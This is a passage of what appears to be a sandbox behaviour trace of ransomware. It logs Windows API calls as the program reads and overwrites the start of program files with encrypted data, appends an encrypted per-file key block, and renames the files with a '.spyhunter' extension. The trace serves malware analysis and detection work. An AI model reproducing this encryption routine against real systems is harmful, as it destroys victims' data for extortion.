lpNumberOfBytesRead=0x270f514, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f514*=0x2800, lpOverlapped=0x0) returned 1 [0122.596] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0122.596] WriteFile (in: hFile=0x120, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f514, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f514*=0x2800, lpOverlapped=0x0) returned 1 [0122.596] GetProcessHeap () returned 0x2c0000 [0122.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0122.597] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.597] WriteFile (in: hFile=0x120, lpBuffer=0x270f554*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f514, lpOverlapped=0x0 | out: lpBuffer=0x270f554*, lpNumberOfBytesWritten=0x270f514*=0x4, lpOverlapped=0x0) returned 1 [0122.818] WriteFile (in: hFile=0x120, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f514, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f514*=0x30, lpOverlapped=0x0) returned 1 [0122.819] CloseHandle (hObject=0x120) returned 1 [0123.012] GetProcessHeap () returned 0x2c0000 [0123.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0123.012] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrw.dll.spyhunter") returned 73 [0123.012] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrw.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\xmlrw.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrw.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\xmlrw.dll.spyhunter")) returned 1 [0123.013] GetProcessHeap () returned 0x2c0000 [0123.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0123.013] GetProcessHeap () returned 0x2c0000 [0123.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0123.013] GetProcessHeap () returned 0x2c0000 [0123.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbf880 | out: hHeap=0x2c0000) returned 1 [0123.015] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f550 | out: pbBuffer=0x270f550) returned 1 [0123.015] GetProcessHeap () returned 0x2c0000 [0123.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0123.015] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f548*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f548*=0x30) returned 1 [0123.015] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\setup.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0123.016] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\setup.exe") returned 86 [0123.016] StrStrW (lpFirst="setup.exe", lpSrch=".txt") returned 0x0 [0123.016] GetProcessHeap () returned 0x2c0000 [0123.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0123.016] ReadFile (in: hFile=0xf4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f50c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f50c*=0x2800, lpOverlapped=0x0) returned 1 [0123.084] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0123.084] WriteFile (in: hFile=0xf4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f50c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f50c*=0x2800, lpOverlapped=0x0) returned 1 [0123.084] GetProcessHeap () returned 0x2c0000 [0123.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0123.084] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.084] WriteFile (in: hFile=0xf4, lpBuffer=0x270f54c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f50c, lpOverlapped=0x0 | out: lpBuffer=0x270f54c*, lpNumberOfBytesWritten=0x270f50c*=0x4, lpOverlapped=0x0) returned 1 [0123.137] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f50c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f50c*=0x30, lpOverlapped=0x0) returned 1 [0123.137] CloseHandle (hObject=0xf4) returned 1 [0123.138] GetProcessHeap () returned 0x2c0000 [0123.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0123.138] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\setup.exe.spyhunter") returned 96 [0123.138] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\setup.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\setup.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\setup.exe.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\setup.exe.spyhunter")) returned 1 [0123.264] GetProcessHeap () returned 0x2c0000 [0123.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0123.264] GetProcessHeap () returned 0x2c0000 [0123.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0123.264] GetProcessHeap () returned 0x2c0000 [0123.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eca0c8 | out: hHeap=0x2c0000) returned 1 [0123.264] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f550 | out: pbBuffer=0x270f550) returned 1 [0123.264] GetProcessHeap () returned 0x2c0000 [0123.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0123.264] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f548*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f548*=0x30) returned 1 [0123.265] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\manifest.json" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0123.266] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\manifest.json") returned 92 [0123.266] StrStrW (lpFirst="manifest.json", lpSrch=".txt") returned 0x0 [0123.266] GetProcessHeap () returned 0x2c0000 [0123.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0123.266] ReadFile (in: hFile=0xf4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f50c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f50c*=0x3b6, lpOverlapped=0x0) returned 1 [0123.308] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xfffffc4a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0123.308] WriteFile (in: hFile=0xf4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x3b6, lpNumberOfBytesWritten=0x270f50c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f50c*=0x3b6, lpOverlapped=0x0) returned 1 [0123.308] GetProcessHeap () returned 0x2c0000 [0123.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0123.308] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.308] WriteFile (in: hFile=0xf4, lpBuffer=0x270f54c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f50c, lpOverlapped=0x0 | out: lpBuffer=0x270f54c*, lpNumberOfBytesWritten=0x270f50c*=0x4, lpOverlapped=0x0) returned 1 [0123.308] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f50c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f50c*=0x30, lpOverlapped=0x0) returned 1 [0123.309] CloseHandle (hObject=0xf4) returned 1 [0123.309] GetProcessHeap () returned 0x2c0000 [0123.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0123.309] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\manifest.json.spyhunter") returned 102 [0123.309] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\manifest.json" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\manifest.json"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\manifest.json.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\manifest.json.spyhunter")) returned 1 [0123.310] GetProcessHeap () returned 0x2c0000 [0123.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0123.310] GetProcessHeap () returned 0x2c0000 [0123.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0123.310] GetProcessHeap () returned 0x2c0000 [0123.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed1de0 | out: hHeap=0x2c0000) returned 1 [0123.312] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f548 | out: pbBuffer=0x270f548) returned 1 [0123.313] GetProcessHeap () returned 0x2c0000 [0123.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0123.313] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f540*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f540*=0x30) returned 1 [0123.313] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogocanary.png" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\smalllogocanary.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0123.313] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogocanary.png") returned 101 [0123.313] StrStrW (lpFirst="smalllogocanary.png", lpSrch=".txt") returned 0x0 [0123.313] GetProcessHeap () returned 0x2c0000 [0123.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0123.314] ReadFile (in: hFile=0xf4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f504, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f504*=0x1ea2, lpOverlapped=0x0) returned 1 [0123.427] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffe15e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0123.427] WriteFile (in: hFile=0xf4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1ea2, lpNumberOfBytesWritten=0x270f504, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f504*=0x1ea2, lpOverlapped=0x0) returned 1 [0123.427] GetProcessHeap () returned 0x2c0000 [0123.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0123.427] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.427] WriteFile (in: hFile=0xf4, lpBuffer=0x270f544*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f504, lpOverlapped=0x0 | out: lpBuffer=0x270f544*, lpNumberOfBytesWritten=0x270f504*=0x4, lpOverlapped=0x0) returned 1 [0123.427] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f504, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f504*=0x30, lpOverlapped=0x0) returned 1 [0123.428] CloseHandle (hObject=0xf4) returned 1 [0123.428] GetProcessHeap () returned 0x2c0000 [0123.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0123.428] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogocanary.png.spyhunter") returned 111 [0123.428] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogocanary.png" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\smalllogocanary.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogocanary.png.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\smalllogocanary.png.spyhunter")) returned 1 [0123.429] GetProcessHeap () returned 0x2c0000 [0123.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0123.429] GetProcessHeap () returned 0x2c0000 [0123.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0123.429] GetProcessHeap () returned 0x2c0000 [0123.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec8240 | out: hHeap=0x2c0000) returned 1 [0123.449] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f538 | out: pbBuffer=0x270f538) returned 1 [0123.449] GetProcessHeap () returned 0x2c0000 [0123.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0123.449] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f530*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f530*=0x30) returned 1 [0123.449] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdmadapter.dll" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\_platform_specific\\win_x64\\widevinecdmadapter.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0123.450] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdmadapter.dll") returned 128 [0123.450] StrStrW (lpFirst="widevinecdmadapter.dll", lpSrch=".txt") returned 0x0 [0123.450] GetProcessHeap () returned 0x2c0000 [0123.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0123.450] ReadFile (in: hFile=0xf4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f4f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f4f4*=0x2800, lpOverlapped=0x0) returned 1 [0123.576] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0123.576] WriteFile (in: hFile=0xf4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f4f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f4f4*=0x2800, lpOverlapped=0x0) returned 1 [0123.576] GetProcessHeap () returned 0x2c0000 [0123.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0123.576] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.576] WriteFile (in: hFile=0xf4, lpBuffer=0x270f534*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f4f4, lpOverlapped=0x0 | out: lpBuffer=0x270f534*, lpNumberOfBytesWritten=0x270f4f4*=0x4, lpOverlapped=0x0) returned 1 [0123.618] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f4f4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f4f4*=0x30, lpOverlapped=0x0) returned 1 [0123.618] CloseHandle (hObject=0xf4) returned 1 [0123.618] GetProcessHeap () returned 0x2c0000 [0123.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0123.618] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdmadapter.dll.spyhunter") returned 138 [0123.618] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdmadapter.dll" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\_platform_specific\\win_x64\\widevinecdmadapter.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdmadapter.dll.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\_platform_specific\\win_x64\\widevinecdmadapter.dll.spyhunter")) returned 1 [0123.620] GetProcessHeap () returned 0x2c0000 [0123.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0123.620] GetProcessHeap () returned 0x2c0000 [0123.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0123.620] GetProcessHeap () returned 0x2c0000 [0123.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec7c30 | out: hHeap=0x2c0000) returned 1 [0123.622] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f530 | out: pbBuffer=0x270f530) returned 1 [0123.622] GetProcessHeap () returned 0x2c0000 [0123.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0123.622] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f528*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f528*=0x30) returned 1 [0123.622] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\zip.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\zip.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0123.623] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\zip.dll") returned 48 [0123.623] StrStrW (lpFirst="zip.dll", lpSrch=".txt") returned 0x0 [0123.623] GetProcessHeap () returned 0x2c0000 [0123.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0123.623] ReadFile (in: hFile=0xf4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f4ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f4ec*=0x2800, lpOverlapped=0x0) returned 1 [0123.746] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0123.747] WriteFile (in: hFile=0xf4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f4ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f4ec*=0x2800, lpOverlapped=0x0) returned 1 [0123.747] GetProcessHeap () returned 0x2c0000 [0123.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0123.747] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.747] WriteFile (in: hFile=0xf4, lpBuffer=0x270f52c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f4ec, lpOverlapped=0x0 | out: lpBuffer=0x270f52c*, lpNumberOfBytesWritten=0x270f4ec*=0x4, lpOverlapped=0x0) returned 1 [0123.780] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f4ec, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f4ec*=0x30, lpOverlapped=0x0) returned 1 [0123.780] CloseHandle (hObject=0xf4) returned 1 [0123.780] GetProcessHeap () returned 0x2c0000 [0123.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0123.780] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\zip.dll.spyhunter") returned 58 [0123.780] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\zip.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\zip.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\zip.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\zip.dll.spyhunter")) returned 1 [0123.781] GetProcessHeap () returned 0x2c0000 [0123.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0123.781] GetProcessHeap () returned 0x2c0000 [0123.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0123.782] GetProcessHeap () returned 0x2c0000 [0123.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21e60 | out: hHeap=0x2c0000) returned 1 [0123.782] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f530 | out: pbBuffer=0x270f530) returned 1 [0123.782] GetProcessHeap () returned 0x2c0000 [0123.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0123.782] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f528*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f528*=0x30) returned 1 [0123.782] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\WindowsAccessBridge-32.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\windowsaccessbridge-32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0123.783] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\WindowsAccessBridge-32.dll") returned 67 [0123.783] StrStrW (lpFirst="WindowsAccessBridge-32.dll", lpSrch=".txt") returned 0x0 [0123.783] GetProcessHeap () returned 0x2c0000 [0123.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0123.783] ReadFile (in: hFile=0xf4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f4ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f4ec*=0x2800, lpOverlapped=0x0) returned 1 [0123.852] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0123.853] WriteFile (in: hFile=0xf4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f4ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f4ec*=0x2800, lpOverlapped=0x0) returned 1 [0123.853] GetProcessHeap () returned 0x2c0000 [0123.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0123.853] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.853] WriteFile (in: hFile=0xf4, lpBuffer=0x270f52c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f4ec, lpOverlapped=0x0 | out: lpBuffer=0x270f52c*, lpNumberOfBytesWritten=0x270f4ec*=0x4, lpOverlapped=0x0) returned 1 [0124.280] WriteFile 